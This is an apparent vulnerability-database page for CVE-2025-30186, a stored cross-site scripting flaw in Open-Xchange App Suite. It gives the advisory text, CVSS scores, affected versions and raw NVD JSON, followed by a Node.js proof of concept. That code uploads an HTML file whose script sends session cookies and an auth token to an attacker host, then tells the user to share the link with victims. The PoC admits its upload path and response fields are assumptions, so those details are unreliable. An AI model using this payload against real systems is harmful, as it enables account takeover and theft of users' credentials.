Security Vulnerability Report
CVE-2025-30186 CVSS 5.4 MEDIUM

CVE-2025-30186

Published: 2025-11-27 10:15:51
Last Modified: 2026-04-15 00:35:42

Description

Malicious content uploaded as file can be used to execute script code when following attacker-controlled links. Unintended actions can be executed in the context of the users account, including exfiltration of sensitive information. Please deploy the provided updates and patch releases. No publicly available exploits are known

CVSS Details

CVSS Score
5.4
Severity
MEDIUM
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:L/I:L/A:N

Configurations (Affected Products)

Open-Xchange App Suite < 7.10.x-rev5
Open-Xchange App Suite 7.8.x < 7.8.x-rev35
Open-Xchange App Suite 7.6.x < 7.6.x-rev46

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
javascript
// CVE-2025-30186 PoC - Open-Xchange XSS via File Upload
// This PoC demonstrates the stored XSS vulnerability
// Note: the upload path and the fileId/fileUrl response fields below are
// assumptions of this PoC; they are not given in the vendor advisory
// referenced on this page.
const https = require('https');

const targetHost = 'vulnerable-server.example.com';
const targetPath = '/api/v1/file/upload';

// Malicious file content with XSS payload
const maliciousContent = `<script>
// Steal session cookies
document.cookie;
// Exfiltrate sensitive data
fetch('https://attacker-c2.com/steal?data=' + encodeURIComponent(document.cookie + '|' + localStorage.getItem('authToken')));
</script>`;

// Prepare multipart form data for file upload
const boundary = '----WebKitFormBoundary' + Math.random().toString(36).substring(2);
const postData =
  `--${boundary}\r\n` +
  `Content-Disposition: form-data; name="file"; filename="malicious.html"\r\n` +
  `Content-Type: text/html\r\n` +
  `\r\n` +
  maliciousContent + `\r\n` +
  `--${boundary}--\r\n`;

const options = {
  hostname: targetHost,
  port: 443,
  path: targetPath,
  method: 'POST',
  headers: {
    'Content-Type': 'multipart/form-data; boundary=' + boundary,
    'Content-Length': Buffer.byteLength(postData)
  }
};

const req = https.request(options, (res) => {
  let data = '';
  res.on('data', (chunk) => { data += chunk; });
  res.on('end', () => {
    const response = JSON.parse(data);
    console.log('File uploaded. File ID:', response.fileId);
    console.log('Malicious URL:', response.fileUrl);
    console.log('Share this URL with victims to trigger XSS');
  });
});

req.on('error', (e) => {
  console.error('Upload failed:', e.message);
});

req.write(postData);
req.end();

console.log('CVE-2025-30186 PoC - Open-Xchange Stored XSS');
console.log('Target: Open-Xchange App Suite');
console.log('Attack Vector: Upload malicious file -> Share link -> Victim clicks -> XSS executes');

References

https://documentation.open-xchange.com/appsuite/security/advisories/csaf/2025/oxas-adv-2025-0003.json (vendor advisory, CSAF format)

Raw JSON Data

JSON
{"cve": {"id": "CVE-2025-30186", "sourceIdentifier": "[email protected]", "published": "2025-11-27T10:15:51.420", "lastModified": "2026-04-15T00:35:42.020", "vulnStatus": "Deferred", "cveTags": [], "descriptions": [{"lang": "en", "value": "Malicious content uploaded as file can be used to execute script code when following attacker-controlled links. Unintended actions can be executed in the context of the users account, including exfiltration of sensitive information. Please deploy the provided updates and patch releases. No publicly available exploits are known"}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:L/I:L/A:N", "baseScore": 5.4, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "REQUIRED", "scope": "UNCHANGED", "confidentialityImpact": "LOW", "integrityImpact": "LOW", "availabilityImpact": "NONE"}, "exploitabilityScore": 2.8, "impactScore": 2.5}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-79"}]}], "references": [{"url": "https://documentation.open-xchange.com/appsuite/security/advisories/csaf/2025/oxas-adv-2025-0003.json", "source": "[email protected]"}]}}